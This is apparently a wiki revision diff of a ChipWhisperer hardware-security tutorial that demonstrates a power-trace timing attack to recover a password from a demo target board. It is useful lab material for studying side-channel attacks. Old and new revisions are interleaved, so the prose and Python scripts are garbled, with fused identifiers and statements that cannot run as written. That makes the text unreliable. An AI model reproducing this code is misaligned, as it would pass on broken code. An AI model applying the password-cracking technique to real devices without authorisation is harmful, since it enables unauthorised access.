Changes

<li><p>Finally, we We will need to set the passwordguess so we can observe different traces. You can enter the password in the Capture ''Target Settings'' tab, or simply use a command like <code>target.go_cmd = 'h0p3\n'</code>.</p></li>

The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here. First, we'll need to import ChipWhisperer: * <code> self.api.capture1()import chipwhisperer as cw</code> acts as if  Then, we've just pressed can build our own "capture controller". This controller deals with talking to the ''Capture 1'' button;scope and target for you. To capture a single trace you could perform the following steps: * <codesyntaxhighlight lang=python> # Test one capturecw.captureN(self.apiscope, self.getScope()target, None, self.channels[0]aux_list, self.getTracektp, 1)trace = scope.getLastTrace()</codesyntaxhighlight> returns a list of datapoints that were recorded in the previous capture. 

<presyntaxhighlight lang=python>#Put this at beginning of scriptimport chipwhisperer as cw #Put this later on after setup happenscw.captureN(self.apiscope, self.capture1()data = target, None, self.apiaux_list, self.getScope(ktp, 1)trace = scope.channels[0].getTracegetLastTrace()print datatrace</presyntaxhighlight> Run your script. The ChipWhisperer should automatically capture one trace and print out the several thousand some datapoints. (Note that output of <code>print</code> statements may go to the ''Debug Logging'' tab in the GUI.) This is all we need to continue.

The <code>run()</code> function at the end of the complete tutorial might look something like the followingthis:<presyntaxhighlight lang=python>"""This script is an example of a timing attack on a simple password checker. It is the result of Tutorial B3-1 from the ChipWhisperer Wiki.""" import chipwhisperer as cwfrom chipwhisperer.capture.auxiliary.ResetCW1173Read import ResetCW1173 # GUI compatibilitytry: def runscope = self.scope target = self.target aux_list = self.aux_listexcept NameError: pass # Set up scopescope.gain.gain = 45scope.adc.samples = 2000scope.adc.offset = 0scope.adc.basic_mode = "rising_edge"scope.clock.clkgen_freq = 7370000scope.clock.adc_src = "clkgen_x4"scope.trigger.triggers = "tio4"scope.io.tio1 = "serial_rx"scope.io.tio2 = "serial_tx"scope.io.hs2 = "clkgen" # Set up targettarget.key_cmd = ""target.go_cmd = "h0px3\n"target.output_cmd = "" # Set up aux module to reset target before captureresetter = ResetCW1173(xmega=True, delay_ms=1200)aux_list.register(resetter.resetThenDelay, "before_trace") # Test one capturecw.captureN(self.scope, self.target, None, self.aux_list, self.ktp, 1)trace = scope.getLastTrace()print trace # Crack the first letterpassword = ''trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # This is the function that gets called when Get a power trace using our script startsnext attempt nextPass = password + '{}'.format(c) + "\n" target.go_cmd = nextPass cw.captureN(self.scope, self.target, None, self.aux_list, self.ktp, 1)

# First: set up Grab the basics and connect to the CW-Litetrace self.api.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC']) self.api.setParameter(['Generic Settings', 'Target Module', 'Simple Serial']) self.api.setParameter(['Generic Settings', 'Trace Format', 'ChipWhisperer/Native']) self.api.setParameter(['Simple Serial', 'Connection', 'ChipWhisperer-Lite']) self.api.setParameter(['ChipWhisperer/OpenADC', 'Connection', 'ChipWhisperer-Lite']) self.apinextTrace = scope.connectgetLastTrace()

# Next: set up everything we need to connect to the target # Put all of our commands in a list and execute them at the end lstexample = [ # Gain ['OpenADC', 'Gain Setting', 'Setting', 45], # Trigger ['OpenADC', 'Trigger Setup', 'Mode', 'rising edge'], ['OpenADC', 'Trigger Setup', 'Offset', 0], ['OpenADC', 'Trigger Setup', 'Total Samples', 2000], # Clock ['OpenADC', 'Clock Setup', 'CLKGEN Settings', 'Desired Frequency', 7370000.0], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'CLKGEN x4 via DCM'], ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None], # Pins ['CW Extra Settings', 'Trigger Pins', 'Target IO4 (Trigger Line)', True], ['CW Extra Settings', 'Target HS IO-Out', 'CLKGEN'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO1', 'Serial RXD'], ['CW Extra Settings', 'Target IOn Pins', 'Target IO2', 'Serial TXD'], # Automatic commands ['Simple Serial', 'Load Key Command', ''], ['Simple Serial', 'Go Command', 'h0px3\n'], ['Simple Serial', 'Output Format', ''], # Auto-reset ['Generic Settings', 'Auxiliary Module', 'Reset AVR/XMEGA via CW-Lite'], ['Aux Settings', 'Reset AVR/XMEGA via CW-Lite', 'Delay (Post-Arm)', 1200], ] #Download all hardware setup parameters for cmd in lstexample: self.api.setParameter(cmd) # Get one capture for fun self.api.capture1() data = self.api.getScope().channels[0].getTrace() print data # Crack the first letter password = '' trylist = 'abcdefghijklmnopqrstuvwxyz0123456789' for i in range(5): for c in trylist: # Get a power trace using our next attempt nextPass = password + '{}'.format(c) self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)]) self.api.capture1() # Grab the trace nextTrace = self.api.getScope().channels[0].getTrace() # Check location 153, 225, etc. If it's too low, we've failed if nextTrace[153 + 72*i] < -0.2: continue # If we got here, we've found the right letter password += c print '{} characters: {}'.format(i+1, password) break</presyntaxhighlight>